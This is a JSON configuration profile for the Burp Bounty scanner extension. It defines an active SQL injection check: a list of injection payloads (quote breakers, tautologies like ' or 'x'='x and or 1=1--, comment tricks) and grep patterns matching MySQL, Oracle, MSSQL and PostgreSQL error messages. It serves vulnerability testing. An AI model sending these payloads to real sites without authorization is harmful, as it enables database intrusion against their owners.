[
  {
    "ProfileName": "SQLi",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      "true,\u0027-\u0027",
      "true,\u0027 \u0027",
      "true,\u0027\u0026\u0027",
      "true,\u0027^\u0027",
      "true,\u0027*\u0027",
      "true,\u0027 or \u0027\u0027-\u0027",
      "true,\u0027 or \u0027\u0027 \u0027",
      "true,\u0027 or \u0027\u0027\u0026\u0027",
      "true,\u0027 or \u0027\u0027^\u0027",
      "true,\u0027 or \u0027\u0027*\u0027",
      "true,\"-\"",
      "true,\" \"",
      "true,\"\u0026\"",
      "true,\"^\"",
      "true,\"*\"",
      "true,\" or \"\"-\"",
      "true,\" or \"\" \"",
      "true,\" or \"\"\u0026\"",
      "true,\" or \"\"^\"",
      "true,\" or \"\"*\"",
      "true,or true--",
      "true,\" or true--",
      "true,\u0027 or true--",
      "true,\") or true--",
      "true,\u0027) or true--",
      "true,\u0027 or \u0027x\u0027\u003d\u0027x",
      "true,\u0027) or (\u0027x\u0027)\u003d(\u0027x",
      "true,\u0027)) or ((\u0027x\u0027))\u003d((\u0027x",
      "true,\" or \"x\"\u003d\"x",
      "true,\") or (\"x\")\u003d(\"x",
      "true,\")) or ((\"x\"))\u003d((\"x",
      "true,or 1\u003d1",
      "true,or 1\u003d1-- ",
      "true,or 1\u003d1#",
      "true,or 1\u003d1/*",
      "true,\u0027",
      "true,\"",
      "true,`",
      "true,\\",
      "true,/*\u0027*/",
      "true,/*!1111\u0027*/",
      "true,\u0027||\u0027asd\u0027||\u0027",
      "true,or\u0027\u0027\u003d\u0027"
    ],
    "Encoder": [],
    "UrlEncode": true,
    "CharsToUrlEncode": "\u0026#",
    "Grep": [
      "true,,Microsoft OLE DB Provider for ODBC Drivers error",
      "true,Or,You have an error in your SQL syntax",
      "true,Or,ORA-00933: SQL command not properly ended",
      "true,Or,Microsoft SQL Native Client error",
      "true,Or,Query failed: ERROR: syntax error at or near",
      "true,Or,You have an error in your SQL syntax",
      "true,Or,MySQL Error: 1064",
      "true,Or,mysql error with query",
      "true,Or,SQL syntax error",
      "true,Or,PostgreSQL query failed: ERROR: parser: parse error",
      "true,Or,Warning: mysql_fetch_array",
      "true,Or,Warning: mysql_num_rows",
      "true,Or,Warning: mysql_query",
      "true,Or,Warning: mysql_fetch_assoc",
      "true,Or,Warning: mysql_result"
    ],
    "Tags": [
      "All",
      "SQLi"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "SQLi",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "\n\n\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      70,
      80,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      21,
      31,
      41,
      51,
      61,
      71,
      72,
      73,
      74,
      75,
      76,
      77,
      36,
      81,
      82
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]